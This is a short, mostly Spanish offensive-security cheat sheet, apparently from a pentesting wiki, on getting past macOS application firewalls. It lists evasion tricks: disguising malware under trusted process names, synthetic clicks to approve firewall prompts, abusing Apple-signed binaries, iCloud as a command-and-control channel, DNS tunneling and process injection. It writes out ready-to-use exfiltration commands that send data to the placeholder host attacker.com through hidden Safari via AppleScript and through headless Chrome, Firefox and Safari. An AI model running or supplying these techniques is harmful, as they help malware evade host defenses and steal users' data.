macOS Bypassing Firewalls

Found techniques

Las siguientes técnicas se encontraron funcionando en algunas aplicaciones de firewall de macOS.

Abusing whitelist names

• Por ejemplo, llamar al malware con nombres de procesos de macOS bien conocidos como launchd

Synthetic Click

• Si el firewall pide permiso al usuario, hacer que el malware haga clic en permitir

Use Apple signed binaries

• Como curl, pero también otros como whois

Well known apple domains

El firewall podría estar permitiendo conexiones a dominios de Apple bien conocidos como apple.com o icloud.com. Y iCloud podría ser utilizado como un C2.

Generic Bypass

Algunas ideas para intentar eludir firewalls

Check allowed traffic

Conocer el tráfico permitido te ayudará a identificar dominios potencialmente en la lista blanca o qué aplicaciones tienen permiso para acceder a ellos.

lsof -i TCP -sTCP:ESTABLISHED

Abusando de DNS

Las resoluciones DNS se realizan a través de la aplicación firmada mdnsreponder que probablemente estará permitida para contactar servidores DNS.

A través de aplicaciones de navegador

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

A través de inyecciones de procesos

Si puedes inyectar código en un proceso que esté permitido para conectarse a cualquier servidor, podrías eludir las protecciones del firewall:

Referencias

• https://www.youtube.com/watch?v=UlT5KFTMn2k